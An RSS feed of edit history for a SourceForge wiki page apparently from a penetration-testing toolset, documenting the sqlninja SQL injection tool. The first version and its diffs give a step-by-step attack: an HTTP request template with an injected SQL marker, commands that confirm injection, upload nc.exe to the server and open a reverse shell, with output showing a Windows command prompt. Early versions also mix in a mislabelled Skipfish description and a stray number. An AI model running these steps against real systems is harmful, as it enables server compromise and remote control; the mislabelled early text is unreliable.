<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom"><channel><title>Recent changes to sqlninja-en</title><link>https://sourceforge.net/p/maguey/wiki/sqlninja-en/</link><description>Recent changes to sqlninja-en</description><atom:link href="https://sourceforge.net/p/maguey/wiki/sqlninja-en/feed" rel="self"/><language>en</language><lastBuildDate>Tue, 10 Dec 2019 16:20:37 -0000</lastBuildDate><atom:link href="https://sourceforge.net/p/maguey/wiki/sqlninja-en/feed" rel="self" type="application/rss+xml"/><item><title>sqlninja-en modified by Maguey</title><link>https://sourceforge.net/p/maguey/wiki/sqlninja-en/</link><description>&lt;div class="markdown_content"&gt;&lt;pre&gt;--- v5
+++ v6
@@ -1,5 +1,5 @@
 
-[[img src=https://sourceforge.net/p/maguey/wiki/Home/attachment/LogoMaguey.png height=25% width=25% style=float:right]]
+[[img src=https://sourceforge.net/p/maguey/wiki/repo_img/attachment/MAGUEY-2-Logo.png height=25% width=25% style=float:right]]
 &lt;br/&gt;&lt;br/&gt;

 &lt;div id="link" style="text-align: right;"&gt;&lt;p&gt;&lt;a href="https://sourceforge.net/p/maguey/wiki/Toolset-en/" style="color: #4CAB68; text-decoration: underline;"&gt;Back&lt;/a&gt;  &lt;a href="https://sourceforge.net/p/maguey/wiki/Skipfish-es" style="color: #4CAB68; text-decoration: underline;"&gt;Español&lt;/a&gt;&lt;/p&gt;&lt;/div&gt;
&lt;/pre&gt;
&lt;/div&gt;</description><dc:creator xmlns:dc="http://purl.org/dc/elements/1.1/">Maguey</dc:creator><pubDate>Tue, 10 Dec 2019 16:20:37 -0000</pubDate><guid>https://sourceforge.netb19980edcc30f39af0d010823da5c121a346d840</guid></item><item><title>sqlninja-en modified by Maguey</title><link>https://sourceforge.net/p/maguey/wiki/sqlninja-en/</link><description>&lt;div class="markdown_content"&gt;&lt;pre&gt;--- v4
+++ v5
@@ -92,7 +92,7 @@
 Sqlninja rel. 0.2.6-r1&lt;br /&gt;
 Copyright (C) 2006-2011 icesurfer &lt;br /&gt;
 [+] Parsing sqlninja.conf...&lt;br /&gt;
-[+] Target is: 172.22.3.89:80&lt;br /&gt;
+[+] Target is: xxx.xxx.xxx.xxx:80&lt;br /&gt;
 [+] Trying to inject a 'waitfor delay'....&lt;br /&gt;
    [+] Injection was successful! Let's rock !! :) &lt;br /&gt;
 &lt;br /&gt;
@@ -129,7 +129,7 @@
 Sqlninja rel. 0.2.6-r1&lt;br /&gt;
 Copyright (C) 2006-2011 icesurfer &lt;br /&gt;
 [+] Parsing sqlninja.conf...&lt;br /&gt;
-[+] Target is: 172.22.3.89:80&lt;br /&gt;&lt;br /&gt;
+[+] Target is: xxx.xxx.xxx.xxx:80&lt;br /&gt;&lt;br /&gt;
 Local port: PUERTO_LOCAL&lt;br /&gt;
 tcp/udp [default: tcp]: PROTOCOLO_TCP_O_UDP&lt;br /&gt;
 [+] waiting for shell on port PUERTO_LOCAL/PROTOCOLO...&lt;br /&gt;
&lt;/pre&gt;
&lt;/div&gt;</description><dc:creator xmlns:dc="http://purl.org/dc/elements/1.1/">Maguey</dc:creator><pubDate>Wed, 11 Dec 2013 22:12:09 -0000</pubDate><guid>https://sourceforge.net0e6764997fdb5aad6528911b7a1ea9fbd8cbda73</guid></item><item><title>sqlninja-en modified by Maguey</title><link>https://sourceforge.net/p/maguey/wiki/sqlninja-en/</link><description>&lt;div class="markdown_content"&gt;&lt;pre&gt;--- v3
+++ v4
@@ -14,55 +14,48 @@
 &lt;!-- **********************  DESCRIPTION ********************** --&gt;

 &lt;h3 style="color: #4CAB68;"&gt;Description: &lt;/h3&gt;
-Tool that performs a vulnerability scan on web applications. It runs in two modes, the first one performs a spidering  of the web application and the second one uses dictionary based brute force attacks.
+Tool specialized in exploiting SQL Injection vulnerabilities present on web applications with a SQL Server database backend. Its functionalities range from data mining to compromise the application server through an uploaded shell.

 &lt;!-- **********************  OBJECTIVES ********************** --&gt;

 &lt;h3 style="color: #4CAB68;"&gt;Objective:&lt;/h3&gt;
 &lt;ul&gt;
-&lt;li&gt;Detect vulnerabilities on the web application.
+&lt;/li&gt;&lt;li&gt;Compromise the application server by exploiting a SQL Injection.
 &lt;/li&gt;&lt;/ul&gt;

 &lt;!-- **********************  FEATURES ********************** --&gt;

 &lt;h3 style="color: #4CAB68;"&gt;Features:&lt;/h3&gt;
-&lt;b&gt;Supported technologies:&lt;/b&gt; Web applications (HTTP).
+&lt;b&gt;Supported technologies:&lt;/b&gt; Web applications (HTTP/HTTPS) with a SQL Server database backend.

 &lt;b&gt;Operative mode:&lt;/b&gt; Active.

 &lt;p&gt;
-Detect vulnerabilities on the web application.
+Compromise the application server by exploiting a SQL Injection.
 &lt;ul&gt;
-&lt;li&gt;Performs a predefined and configurable spidering on the web application; configurations include domain on the scope, restricted URLs and parameters, etc.
-&lt;/li&gt;&lt;li&gt;dentify common vulnerabilities such as Cross Site Script, SQL Injection, Path Traversal, Information Disclosure, etc.
-&lt;/li&gt;&lt;li&gt;Provides a configurable dictionary base brute force attack functionality in order to detect commons resources such as administrative, default and test pages, files backups (.old), etc.
-&lt;/li&gt;&lt;li&gt;Has the capability to include self-defined dictionaries to be used on the brute force module.
+&lt;/li&gt;&lt;li&gt;Provides information about the database configuration.
+&lt;/li&gt;&lt;li&gt;Provides a file upload functionality  in order to execute malicious file in the application server.
+&lt;/li&gt;&lt;li&gt;Performs a dictionary based brute force attack to retrieve the “sa” account password.
+&lt;/li&gt;&lt;li&gt;Provide a functionality to execute operative systems commands.
 &lt;/li&gt;&lt;/ul&gt;
 &lt;/p&gt;

 &lt;p&gt;
 &lt;b&gt;Reports:&lt;/b&gt;&lt;br /&gt;
-Output reports:  &lt;span style="color: #4CAB68; font-weight: bold; font-style: italic; font-size: 20px;"&gt;&amp;#10004;&lt;/span&gt;
-&lt;br /&gt;
-Reports in HTML format which includes the visited URLS and detected vulnerabilities divided into three sections:
-&lt;ul&gt;
-&lt;li&gt;URL: URLs detected by the spidering module.
-&lt;/li&gt;&lt;li&gt;Document type: URL categorization by content based on the response.
-&lt;/li&gt;&lt;li&gt;Detected vulnerabilities: URL groups by matching vulnerabilities.
-&lt;/li&gt;&lt;/ul&gt;
+Output reports:  &lt;span style="color: #4CAB68; font-weight: bold; font-style: italic; font-size: 20px;"&gt;X&lt;/span&gt;
 &lt;/p&gt;

 &lt;!-- **********************  USAGE ********************** --&gt;

 &lt;h3 style="color: #4CAB68;"&gt;Basic usage:&lt;/h3&gt;
-&lt;b&gt;Obtener una Reverse Shell del servidor base de datos. &lt;/b&gt;Llenar el archivo de configuración de sqlninja con los siguientes datos:
+&lt;b&gt;Create a Reverse Shell on the database server. &lt;/b&gt;Edit the sqlninja configuration file to include the following information:
 &lt;ul&gt;
-&lt;li&gt;Petición HTTP con parámetro vulnerable.
-&lt;/li&gt;&lt;li&gt;IP local. 
+&lt;/li&gt;&lt;li&gt;Petition with the vulnerable parameter.
+&lt;/li&gt;&lt;li&gt;Local IP address.
 &lt;/li&gt;&lt;/ul&gt;
 

-El archivo lucirá de la siguiente manera:
+The configuration file will be similar to the following:

 &lt;div id="code" style="background-color: #85BF93; padding-top: 20px; padding-right: 0px; padding-bottom: 20px; padding-left: 40px; margin-top: 0px; margin-right: 10px; margin-bottom: 0px; margin-left: 10px; border: 0px solid;"&gt;
 … &lt;br /&gt;
@@ -92,7 +85,7 @@

 &lt;/div&gt;&lt;br /&gt;

-Una vez que se termina de llenar el archivo de configuración se procede a ejecutar la herramienta, esta nos indicará con el mensaje Injection was successful! Let's rock !! :) que la vulnerabilidad es explotable.
+Once the configuration is in place it can be used by the tool which will display the message “Let’s rock !!! :)” in case the SQL Injection is successful.

 &lt;div id="code" style="background-color: #85BF93; padding-top: 20px; padding-right: 0px; padding-bottom: 20px; padding-left: 40px; margin-top: 0px; margin-right: 10px; margin-bottom: 0px; margin-left: 10px; border: 0px solid;"&gt;
 root@maguey:/tools/explotation/sqlninja # ./sqlninja -m t&lt;br /&gt;
@@ -104,7 +97,7 @@
    [+] Injection was successful! Let's rock !! :) &lt;br /&gt;
 &lt;/div&gt;&lt;br /&gt;

-Ejecute el comando . /sqlninja -m u y eleja la opción apps/nc.exe. 
+Execute the following command “. /sqlninja -m u“ and select the option “apps/nc.exe”.

 &lt;div id="code" style="background-color: #85BF93; padding-top: 20px; padding-right: 0px; padding-bottom: 20px; padding-left: 40px; margin-top: 0px; margin-right: 10px; margin-bottom: 0px; margin-left: 10px; border: 0px solid;"&gt;
 root@maguey:/tools/explotation/sqlninja # ./sqlninja -m u&lt;br /&gt;
@@ -129,7 +122,7 @@
 [+] Filesize corresponds... :)
 &lt;/div&gt;&lt;br /&gt;

-La herramienta subirá un archivo con el objetivo de ejecutar un Reverse Shell, utilice el siguiente comando para lograrlo ./sqlninja -m r.
+The tool will upload the file with the objective to create a reverse shell by using the following command “./sqlninja -m r”.

 &lt;div id="code" style="background-color: #85BF93; padding-top: 20px; padding-right: 0px; padding-bottom: 20px; padding-left: 40px; margin-top: 0px; margin-right: 10px; margin-bottom: 0px; margin-left: 10px; border: 0px solid;"&gt;
 root@maguey:/tools/explotation/sqlninja # ./sqlninja -m r&lt;br /&gt;
&lt;/div&gt;&lt;/pre&gt;
&lt;/div&gt;</description><dc:creator xmlns:dc="http://purl.org/dc/elements/1.1/">Maguey</dc:creator><pubDate>Wed, 11 Dec 2013 22:03:39 -0000</pubDate><guid>https://sourceforge.netd83c4804eff81d6c049dc4746bc4fa05280eb7d2</guid></item><item><title>sqlninja-en modified by Maguey</title><link>https://sourceforge.net/p/maguey/wiki/sqlninja-en/</link><description>&lt;div class="markdown_content"&gt;&lt;pre&gt;--- v2
+++ v3
@@ -7,7 +7,7 @@
 &lt;h1 style="color: #4CAB68;"&gt;sqlninja&lt;/h1&gt;
 &lt;!-- **********************  PHASES ********************** --&gt;

-&lt;h3 style="color: #4CAB68;"&gt;Phase(s):&lt;/h3&gt;1769242397
+&lt;h3 style="color: #4CAB68;"&gt;Phase(s):&lt;/h3&gt;
 Primary: Exploitation.
 Secondary:  N/A.

&lt;/pre&gt;
&lt;/div&gt;</description><dc:creator xmlns:dc="http://purl.org/dc/elements/1.1/">Maguey</dc:creator><pubDate>Wed, 11 Dec 2013 21:57:02 -0000</pubDate><guid>https://sourceforge.net8e95124e52997aa0ddf1037c8bbbd6fb293d27f8</guid></item><item><title>sqlninja-en modified by Maguey</title><link>https://sourceforge.net/p/maguey/wiki/sqlninja-en/</link><description>&lt;div class="markdown_content"&gt;&lt;pre&gt;--- v1
+++ v2
@@ -4,7 +4,7 @@

 &lt;div id="link" style="text-align: right;"&gt;&lt;p&gt;&lt;a href="https://sourceforge.net/p/maguey/wiki/Toolset-en/" style="color: #4CAB68; text-decoration: underline;"&gt;Back&lt;/a&gt;&amp;nbsp;&amp;nbsp;&lt;a href="https://sourceforge.net/p/maguey/wiki/Skipfish-es" style="color: #4CAB68; text-decoration: underline;"&gt;Español&lt;/a&gt;&lt;/p&gt;&lt;/div&gt;

-&lt;h1 style="color: #4CAB68;"&gt;Skipfish&lt;/h1&gt;
+&lt;h1 style="color: #4CAB68;"&gt;sqlninja&lt;/h1&gt;
 &lt;!-- **********************  PHASES ********************** --&gt;

 &lt;h3 style="color: #4CAB68;"&gt;Phase(s):&lt;/h3&gt;1769242397
&lt;/pre&gt;
&lt;/div&gt;</description><dc:creator xmlns:dc="http://purl.org/dc/elements/1.1/">Maguey</dc:creator><pubDate>Wed, 11 Dec 2013 21:05:24 -0000</pubDate><guid>https://sourceforge.net142bc9acbc6c1f5b3eabdd950d7d81c7d0ebc5e1</guid></item><item><title>sqlninja-en modified by Maguey</title><link>https://sourceforge.net/p/maguey/wiki/sqlninja-en/</link><description>&lt;div class="markdown_content"&gt;&lt;!-- ###################################### ENGLISH VERSION ###################################### --&gt;
&lt;p&gt;&lt;img height="25%" src="https://sourceforge.net/p/maguey/wiki/Home/attachment/LogoMaguey.png" style="float: right;" width="25%" /&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;
&lt;div id="link" style="text-align: right;"&gt;&lt;p&gt;&lt;a href="https://sourceforge.net/p/maguey/wiki/Toolset-en/" style="color: #4CAB68; text-decoration: underline;"&gt;Back&lt;/a&gt;&amp;nbsp;&amp;nbsp;&lt;a href="https://sourceforge.net/p/maguey/wiki/Skipfish-es" style="color: #4CAB68; text-decoration: underline;"&gt;Español&lt;/a&gt;&lt;/p&gt;&lt;/div&gt;
&lt;h1 style="color: #4CAB68;"&gt;Skipfish&lt;/h1&gt;
&lt;!-- **********************  PHASES ********************** --&gt;
&lt;h3 style="color: #4CAB68;"&gt;Phase(s):&lt;/h3&gt;
&lt;p&gt;1769242397&lt;br /&gt;
Primary: Exploitation.&lt;br /&gt;
Secondary:  N/A.&lt;/p&gt;
&lt;!-- **********************  DESCRIPTION ********************** --&gt;
&lt;h3 style="color: #4CAB68;"&gt;Description: &lt;/h3&gt;
&lt;p&gt;Tool that performs a vulnerability scan on web applications. It runs in two modes, the first one performs a spidering  of the web application and the second one uses dictionary based brute force attacks.&lt;/p&gt;
&lt;!-- **********************  OBJECTIVES ********************** --&gt;
&lt;h3 style="color: #4CAB68;"&gt;Objective:&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Detect vulnerabilities on the web application.
&lt;/li&gt;&lt;/ul&gt;
&lt;!-- **********************  FEATURES ********************** --&gt;
&lt;h3 style="color: #4CAB68;"&gt;Features:&lt;/h3&gt;
&lt;p&gt;&lt;b&gt;Supported technologies:&lt;/b&gt; Web applications (HTTP).&lt;/p&gt;
&lt;p&gt;&lt;b&gt;Operative mode:&lt;/b&gt; Active.&lt;/p&gt;
&lt;p&gt;
Detect vulnerabilities on the web application.
&lt;ul&gt;
&lt;li&gt;Performs a predefined and configurable spidering on the web application; configurations include domain on the scope, restricted URLs and parameters, etc.
&lt;/li&gt;&lt;li&gt;dentify common vulnerabilities such as Cross Site Script, SQL Injection, Path Traversal, Information Disclosure, etc.
&lt;/li&gt;&lt;li&gt;Provides a configurable dictionary base brute force attack functionality in order to detect commons resources such as administrative, default and test pages, files backups (.old), etc.
&lt;/li&gt;&lt;li&gt;Has the capability to include self-defined dictionaries to be used on the brute force module.
&lt;/li&gt;&lt;/ul&gt;
&lt;/p&gt;
&lt;p&gt;
&lt;b&gt;Reports:&lt;/b&gt;&lt;br /&gt;
Output reports:  &lt;span style="color: #4CAB68; font-weight: bold; font-style: italic; font-size: 20px;"&gt;&amp;#10004;&lt;/span&gt;
&lt;br /&gt;
Reports in HTML format which includes the visited URLS and detected vulnerabilities divided into three sections:
&lt;ul&gt;
&lt;li&gt;URL: URLs detected by the spidering module.
&lt;/li&gt;&lt;li&gt;Document type: URL categorization by content based on the response.
&lt;/li&gt;&lt;li&gt;Detected vulnerabilities: URL groups by matching vulnerabilities.
&lt;/li&gt;&lt;/ul&gt;
&lt;/p&gt;
&lt;!-- **********************  USAGE ********************** --&gt;
&lt;h3 style="color: #4CAB68;"&gt;Basic usage:&lt;/h3&gt;
&lt;p&gt;&lt;b&gt;Obtener una Reverse Shell del servidor base de datos. &lt;/b&gt;Llenar el archivo de configuración de sqlninja con los siguientes datos:&lt;br /&gt;
&lt;ul&gt;&lt;br /&gt;
&lt;li&gt;Petición HTTP con parámetro vulnerable.&lt;br /&gt;
&lt;/li&gt;&lt;li&gt;IP local. &lt;br /&gt;
&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;
&lt;/p&gt;
&lt;p&gt;El archivo lucirá de la siguiente manera:&lt;/p&gt;
&lt;div id="code" style="background-color: #85BF93; padding-top: 20px; padding-right: 0px; padding-bottom: 20px; padding-left: 40px; margin-top: 0px; margin-right: 10px; margin-bottom: 0px; margin-left: 10px; border: 0px solid;"&gt;
… &lt;br /&gt;
########### HTTP REQUEST ############&lt;br /&gt;
# The entire HTTP request, including the exploit string and a marker for the &lt;br /&gt;
# SQL command to execute (__SQL2INJECT__)&lt;br /&gt;
# Be sure to include the vulnerable parameter and the character sequence that&lt;br /&gt;
# allows us to start injecting commands. In general this means, at least:&lt;br /&gt;
# - an apostrophe (if the parameter is a string)&lt;br /&gt;
# - a semicolon (to end the original query) &lt;br /&gt;
&lt;br /&gt;
--httprequest_start-- &lt;br /&gt;
POST http://URL/PAGE.aspx HTTP/1.1&lt;br /&gt;
Host: HOST_APPLICACION&lt;br /&gt;
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:18.0) &lt;br /&gt;
OTRAS_CABECERAS&lt;br /&gt;
&lt;br /&gt;
__VIEWSTATE=%2FwEPDwUKMjA3NjE4MDczNmRkf2IECGUitTpu0vVIUhu3wPxao%2FF6r4sHEdlYxzYXX%2F8%3D&amp;&lt;br /&gt;__EVENTVALIDATION=%2FwEWAwLv6%2FCgCgL%2F%2BOneAgKfwImNC3%2Fnbpb9DZ7tw0IU78vRV%2BiuANd7HLE5bz%2B5vRy0MIk6&amp;amp;param_vulnerable=Dato';__SQL2INJECT__&amp;amp;ctl02=Search%21 &lt;br /&gt;
--httprequest_end—&lt;br /&gt;
&lt;br /&gt;
…&lt;br /&gt;
&lt;br /&gt;
# Local host: your IP address (for backscan and revshell modes)&lt;br /&gt;
lhost = localhost&lt;br /&gt;
&lt;br /&gt;
… &lt;br /&gt;
&lt;/div&gt;
&lt;p&gt;&lt;br /&gt;&lt;/p&gt;
&lt;p&gt;Una vez que se termina de llenar el archivo de configuración se procede a ejecutar la herramienta, esta nos indicará con el mensaje Injection was successful! Let's rock !! :) que la vulnerabilidad es explotable.&lt;/p&gt;
&lt;div id="code" style="background-color: #85BF93; padding-top: 20px; padding-right: 0px; padding-bottom: 20px; padding-left: 40px; margin-top: 0px; margin-right: 10px; margin-bottom: 0px; margin-left: 10px; border: 0px solid;"&gt;
root@maguey:/tools/explotation/sqlninja # ./sqlninja -m t&lt;br /&gt;
Sqlninja rel. 0.2.6-r1&lt;br /&gt;
Copyright (C) 2006-2011 icesurfer &lt;br /&gt;
[+] Parsing sqlninja.conf...&lt;br /&gt;
[+] Target is: 172.22.3.89:80&lt;br /&gt;
[+] Trying to inject a 'waitfor delay'....&lt;br /&gt;
    [+] Injection was successful! Let's rock !! :) &lt;br /&gt;
&lt;/div&gt;
&lt;p&gt;&lt;br /&gt;&lt;/p&gt;
&lt;p&gt;Ejecute el comando . /sqlninja -m u y eleja la opción apps/nc.exe. &lt;/p&gt;
&lt;div id="code" style="background-color: #85BF93; padding-top: 20px; padding-right: 0px; padding-bottom: 20px; padding-left: 40px; margin-top: 0px; margin-right: 10px; margin-bottom: 0px; margin-left: 10px; border: 0px solid;"&gt;
root@maguey:/tools/explotation/sqlninja # ./sqlninja -m u&lt;br /&gt;
Sqlninja rel. 0.2.6-r1&lt;br /&gt;
Copyright (C) 2006-2011 icesurfer &lt;br /&gt;
[+] Parsing sqlninja.conf...&lt;br /&gt;
[+] Target is: HOST_ATAQUE&lt;br /&gt;
  Specify the binary or script file to upload&lt;br /&gt;
  shortcuts:&lt;br /&gt;
    1: apps/nc.exe&lt;br /&gt;
    2: apps/dnstun.exe&lt;br /&gt;
    3: apps/churrasco.exe&lt;br /&gt;
    4: apps/icmpsh.exe&lt;br /&gt;
    5: apps/vdmallowed.exe&lt;br /&gt;
    6: apps/vdmexploit.dll&lt;br /&gt;
  &gt; 1&lt;br /&gt;
[+] Uploading /tmp/nc.scr debug script............&lt;br /&gt;
1540/1540 lines written         &lt;br /&gt;
done!&lt;br /&gt;
[+] Converting script to executable... might take a while&lt;br /&gt;
[+] Checking that nc.exe has the expected filesize...&lt;br /&gt;    
[+] Filesize corresponds... :)
&lt;/div&gt;
&lt;p&gt;&lt;br /&gt;&lt;/p&gt;
&lt;p&gt;La herramienta subirá un archivo con el objetivo de ejecutar un Reverse Shell, utilice el siguiente comando para lograrlo ./sqlninja -m r.&lt;/p&gt;
&lt;div id="code" style="background-color: #85BF93; padding-top: 20px; padding-right: 0px; padding-bottom: 20px; padding-left: 40px; margin-top: 0px; margin-right: 10px; margin-bottom: 0px; margin-left: 10px; border: 0px solid;"&gt;
root@maguey:/tools/explotation/sqlninja # ./sqlninja -m r&lt;br /&gt;
Sqlninja rel. 0.2.6-r1&lt;br /&gt;
Copyright (C) 2006-2011 icesurfer &lt;br /&gt;
[+] Parsing sqlninja.conf...&lt;br /&gt;
[+] Target is: 172.22.3.89:80&lt;br /&gt;&lt;br /&gt;
Local port: PUERTO_LOCAL&lt;br /&gt;
tcp/udp [default: tcp]: PROTOCOLO_TCP_O_UDP&lt;br /&gt;
[+] waiting for shell on port PUERTO_LOCAL/PROTOCOLO...&lt;br /&gt;
&lt;br /&gt;
Microsoft Windows #### [Version #####]&lt;br /&gt;
(C) Copyright 1985-2000 Microsoft Corp.&lt;br /&gt;
&lt;br /&gt;
C:\WINNT\system32&gt;whoami&lt;br /&gt;
whoami&lt;br /&gt;
HOSTNAME\USERNAME&lt;br /&gt;
&lt;/div&gt;
&lt;p&gt;&lt;br /&gt;&lt;/p&gt;
&lt;!-- **********************  RESOURCES ********************** --&gt;
&lt;h3 style="color: #4CAB68;"&gt;Resources:&lt;/h3&gt;
&lt;p&gt;&lt;b&gt;Link:&lt;/b&gt; &lt;a href="http://sqlninja.sourceforge.net/"&gt;http://sqlninja.sourceforge.net/&lt;/a&gt;&lt;br /&gt;
&lt;b&gt;Author(s):&lt;/b&gt; icesurfer&lt;br /&gt;
&lt;b&gt;Contact:&lt;/b&gt; r00t [at] northernfortress.net&lt;br /&gt;
&lt;b&gt;License:&lt;/b&gt; GPL versión 3&lt;/p&gt;&lt;/div&gt;</description><dc:creator xmlns:dc="http://purl.org/dc/elements/1.1/">Maguey</dc:creator><pubDate>Wed, 11 Dec 2013 21:04:58 -0000</pubDate><guid>https://sourceforge.netcb39764b30a0da0f7f9d175ee8063d96726c7a2f</guid></item></channel></rss>